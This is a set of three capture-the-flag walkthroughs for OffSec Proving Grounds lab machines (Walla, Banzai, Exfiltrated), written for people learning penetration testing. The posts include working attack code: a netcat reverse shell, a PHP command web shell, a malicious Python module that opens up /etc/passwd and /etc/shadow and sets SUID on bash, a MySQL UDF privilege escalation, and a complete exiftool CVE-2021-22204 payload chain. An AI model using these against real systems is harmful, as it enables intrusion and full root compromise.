Offensive Security PG Practice: Walla – Walk-through – Tutorial – Writeup

Name: Offensive Security PG Practice – Walla
URL: https://portal.offensive-security.com/proving-grounds/practice
Release Date: 15 March 2021
Author: OffSec
Difficulty Stated: Intermediate
Difficulty I found: Intermediate
CTF or Real-life: Mix
Learning out of box : Good
OS used: KaliLinux 2021.2
Things you can learn from this VM: Enumeration, Default credentials vulnerability, CVE-2020-24572 exploitation, Reverse shell, Privilege escalation via Python module.

Nmap found a number of open TCP ports.

nmap -r -v --min-rate=1500 -p- -oN 001-nmap-tcp-full 192.168.173.97

We used following script to grab the TCP ports.

cat 001-nmap-tcp-full | grep "/tcp" | cut -d "/" -f1 | tr "\n" ","

And again ran NMAP against the open ports to further get information.

nmap -r -v -sC -sV -p 22,23,25,53,422,8091,42042 -oN 002-nmap-tcp-sel 192.168.173.97

We found a number of SSH servers having identical KEYS, this was a bit strange. Tried running default credentials against TELNET but no success.

Ran gobuster against the web server but didn’t get anything fruitful.

gobuster dir -e -w /usr/share/wordlists/dirb/big.txt -t 3 -u http://192.168.173.97:8091 | tee 200_gobuster_log

Visited the web server at port 8091 but it had some basic authentication in placed.

Googled this “RaspAP” and found its a web interface for a router /access point device.

Different forums on the internet revealed, it has default credentials of “admin:secret”.

So we used those credentials and got in.

Identified the version to be 2.5.

There is a CVE-2020-24572 of command injection for this version of RaspAP.

Although there are public exploits out, but I used the manual way of having a reverse shell.

nc <Your VPN IP> <Your Listening Port> -e /bin/sh &

And we had a shell as www-data.

Next, converted our shell to TTY

python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

stty raw -echo
fg
fg

export SHELL=bash
export TERM=xterm
stty rows <your row numbers> columns <your col numbers>
reset

Read the user flag.

The current user ‘www-data’ can run a number of sudo commands and it seemed that wifi_reset.py was custom one.

sudo -l

wifi_reset.py was importing a module wificontroller and executing some commands but this wifcontroller module was absent.

So ,we created our malicious wificontroller.py module inside the same folder i.e. /home/walter which had the malicious Privilege Escalation code. And executed it.

import os

def stop(text,value):
        os.system("chmod 777 /etc/passwd");

def reset(text,value):
        os.system("chmod +s /bin/bash");

def start(text,value):
        os.system("chmod 777 /etc/shadow");

As a result of executing it, we got following results.

BASH is having SUID bit. So, we became root with following command and read the root flag.

/bin/bash -p 

Bonus

If you’re too lazy, you can use this public exploit for catching the reverse shell i ¯_(ツ)_/¯.

raspap.php has the credentials.

<?php

$config = array(
    'admin_user' => 'admin',
    'admin_pass' => '$2y$10$YKIyWAmnQLtiJAy6QgHQ.eCpY4m.HCEbiHaTgN6.acNC6bDElzt.i'
);

if (file_exists(RASPI_CONFIG.'/raspap.auth')) {
    if ($auth_details = fopen(RASPI_CONFIG.'/raspap.auth', 'r')) {
        $config['admin_user'] = trim(fgets($auth_details));
        $config['admin_pass'] = trim(fgets($auth_details));
        fclose($auth_details);
    }
}

Lets identify this hash algorithm first.

hashid  -m '$2y$10$YKIyWAmnQLtiJAy6QgHQ.eCpY4m.HCEbiHaTgN6.acNC6bDElzt.i'

We can use hashcat to crack this hash.

hashcat -a 0 -m 3200 hash_value /usr/share/wordlists/rockyou.txt

SSH configuration has specified 03 listening ports.

Don’t have any iptables rules.

Offensive Security PG Practice: Banzai – Walk-through – Tutorial – Writeup

Name: Offensive Security PG Practice – Banzai
URL: https://portal.offensive-security.com/proving-grounds/practice
Release Date: 03 Sep 2020
Author: OffSec
Difficulty Stated: Intermediate
Difficulty I found: Intermediate
CTF or Real-life: Kind of Real life
Learning out of box : Good
OS used: KaliLinux 2021.2
Things you can learn from this VM: Enumeration, Default credentials vulnerability, Reverse shell, Privilege escalation MySQL User-Defined Function (UDF) Dynamic Library exploitation.

nmap found a lot of open TCP ports.

nmap -r -v --min-rate=1500 -p- -oN 001-nmap-full 192.168.74.56

Tried common default credentials for postgres (5432) but no success in it.

psql -h 192.168.140.56 -p 5432 -U admin -W

gobuster for web servers on port 8295 and 8080 also didn;t give us anything fruitful.

We tried default credentials for FTP “admin:admin” and got in. ^_^

As we were in web directory, so we uploaded a malicious php file myrce.php.

<?php system($_GET['cmd']); ?>

And we got RCE (remote code execution).

Grabbed a python based reverse shell from here and popped the box .

Read the local flag.

We found that mysql is running as root user.

ps -aux | grep root | grep sql

And we had credentials of mysql in a file .

<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'EscalateRaftHubris123');
define('DBNAME', 'main');
?>

Now, we’ll load the raptor_udf library for code execution from here.

Download the raptor c file to Banzai & compile it.

gcc -g -c raptor_udf.c
gcc -g -shared -Wl,-soname,raptor_udf.so -o raptor_udf.so raptor_udf.o -lc

Next login to mysql and perform following steps.

use mysql;
create table foo(line blob);
insert into foo values(load_file('/dev/shm/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
select * from mysql.func;
select do_system('chmod 777 /etc/passwd');

Now, anyone can modify /etc/passwd file. So, we will add a new user skinny1 with password 123 as root level privileges.

Read the root flag.

Offensive Security PG Practice: Exfiltrated – Walk-through – Tutorial – Writeup

Name: Offensive Security PG Practice – Exfiltrated
URL: https://portal.offensive-security.com/proving-grounds/practice
Release Date: 06 Sep 2021
Author: Naqi ‘Enox’ Ansari
Difficulty Stated: Easy
Difficulty I found: Intermediate
CTF or Real-life: Kind of Real life
Learning out of box : Good
OS used: KaliLinux 2021.2
Things you can learn from this VM: Enumeration, Arbitrary file upload & Remote code execution vulnerability CVE 2018-19422, Privilege escalation via Arbitrary code execution CVE-2021-22204

Nmap only showed two TCP ports i.e. 22 and 80.

nmap -r -v --min-rate 1000 -p- -oN 001-nmap-tcp-all-ports 192.168.250.163

We further enumerated these two ports for service/version details.

nmap -r -v -sC -sV -p 22,80 -oN 002-nmap-tcp-selected 192.168.250.163

Added the IP and Domain to our /etc/hosts file.

Visited the website and immediately noticed the CMS on which the site was made on (Subrion CMS) .

Robots.txt had some interesting locations so manually visited each location.

Panel directory revealed the exact version i.e. Subrion CMS 4.2.1 and required user credentials.

We successfully logged in by using default credentials admin:admin.

ExploitDB and many online forums have the publicly available exploit for this version of Subrion CMS.

But we created our own malicious php file with extension .phar.

<?php system($_GET['cmd']); ?>

And uploaded it to the Subrion CMS.

Noted down its location (full path).

And we had successful remote code execution.

Grabbed Python3 reverse shell code from here.

And caught a reverse shell as www-data user.

Linpeas identified a cronjob being executed as root user.

And we can verify it with pspy too.

And script was running exiftool.

At this moment I was confused / puzzled and slightly felt s**t. After spending like 3-4 hrs I thought maybe exiftool is vulnerable.

So, google gave me lead me to -> CVE-2021-22204

Although there are numerous article out to exploit this CVE but I liked & copied this Amal Murali way for exploiting exiftool vulnerability.

Following are my steps that makes /bin/bash a SUID binary.

sudo apt-get install -y djvulibre-bin
wget -qO sample.jpg placekitten.com/200
file sample.jpg
printf 'P1 1 1 1' > input.pbm
cjb2 input.pbm mask.djvu
djvumake exploit.djvu Sjbz=mask.djvu
echo -e '(metadata (copyright "\\\n" . `chmod +s /bin/bash` #"))' > input.txt
djvumake exploit.djvu Sjbz=mask.djvu ANTa=input.txt
exiftool '-GeoTiffAsciiParams<=exploit.djvu' sample.jpg
perl -0777 -pe 's/\x87\xb1/\xc5\x1b/g' < sample.jpg > exploit.jpg

We upload this malicious exploit.jpg to the Subrion CMS again and after like 10-15 seconds our /bin/bash had SUID bit.

Read the root first and then the user flag.

BONUS

The database credentials.

<?php
/*
 * Subrion Open Source CMS 4.2.1
 * Config file generated on 10 June 2021 12:04:54
 */

define('INTELLI_CONNECT', 'mysqli');
define('INTELLI_DBHOST', 'localhost');
define('INTELLI_DBUSER', 'subrionuser');
define('INTELLI_DBPASS', 'target100');
define('INTELLI_DBNAME', 'subrion');
define('INTELLI_DBPORT', '3306'); 
define('INTELLI_DBPREFIX', 'sbr421_');

define('IA_SALT', '#5A7C224B51'); 

// debug mode: 0 - disabled, 1 - enabled
define('INTELLI_DEBUG', 0);

Apache configuration.

<VirtualHost *:80>
     ServerAdmin admin@exfiltrated.offsec
     DocumentRoot /var/www/html/subrion
     ServerName exfiltrated.offsec

     <Directory /var/www/html/subrion/>
          Options FollowSymlinks
          AllowOverride All
          Require all granted
     </Directory>

     ErrorLog ${APACHE_LOG_DIR}/error.log
     CustomLog ${APACHE_LOG_DIR}/access.log combined


Tried running this exploit but it fails, not sure, dont have time to debug + fix this.